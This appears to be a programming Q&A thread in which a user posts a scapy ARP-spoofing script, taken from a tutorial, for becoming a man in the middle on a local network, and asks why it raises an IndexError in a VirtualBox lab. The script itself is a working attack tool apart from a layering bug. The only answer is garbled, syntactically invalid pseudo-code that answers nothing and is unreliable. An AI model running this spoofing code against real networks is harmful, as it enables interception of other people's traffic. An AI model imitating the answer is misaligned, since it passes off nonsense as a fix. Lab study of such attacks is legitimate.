# How to overcome this Index error in Python

Tags: python, virtualbox, arp, index-error, server-side-attacks

The code given below is exactly as shown in the tutorial(zsecurity)
it seems the code does not working only on my system.i run this code in linux (virtual box).

this is an arpspoofing used to become the man in the middle in local network.

i implement this attack on the another guest os windows 10.

```
import scapy.all as scapy
import time
import sys

def get_mac(ip):
    arp_request = scapy.ARP(pdst = ip)
    broadcast=scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_broadcast_reqest=arp_request/broadcast
    answered_list =scapy.srp(arp_broadcast_reqest, timeout=1, verbose=False)[0]
    return answered_list[0][1].hwsrc


def arp_spoof(target_ip, spoof_ip):
    target_mac= get_mac(target_ip)
    packet= scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    scapy.send(packet, verbose=False)

def restore(destination_ip,source_ip):
    destination_mac=get_mac(destination_ip)
    source_mac=get_mac(source_ip)
    packet= scapy.ARP(op=2, pdst=destination_ip,hwdst=destination_mac,psrc=source_ip, hwsrc=source_mac)
    scapy.send(packet,count=4, verbose=False)

target_ip="10.0.2.4"
gateway_ip="10.0.2.1"

try:
     sent_packets = 0
     while True:
        arp_spoof(target_ip,gateway_ip)
        arp_spoof(gateway_ip,target_ip)
        sent_packets=sent_packets + 2
        print("\r the packets sent:" + str(sent_packets)),
        sys.stdout.flush()
        time.sleep(2)
except KeyboardInterrupt:
    print("detectedd ctrl+c......quitting")
    restore(target_ip,gateway_ip)
    restore(gateway_ip,target_ip)
```

Comment: Please format your code. So we can analyze the code better.

Answer (score 0):

Try using this.

```
from socket import *

from overflows import *
import use_socket

def connect(ipv6_addr: Dec, port: simplicity, port:paste, from_port: av) as orig:
     NetworkPort_ping, delegate_messed_port: 127.0. 0.0
     History().channel(fl)
     CountDownPorts(chain_count, 0)
     TcpTelnetPort.connect(port, to_network(port))
     Serial_packet
     Serial.wait(boot_java)
     For USB_Added = True
     if (usb_usb.ReadScreen):
         print("USB receiving device")
         print which.ip_port()
         print def.rid
         callback.data
     ELSE
         byte_frame += 1
     will crash unless "++com_available" is attempting to be done later
     sends_over(dot, sleep.status)
     print "Connected :\n"

na_registered.send(500)
```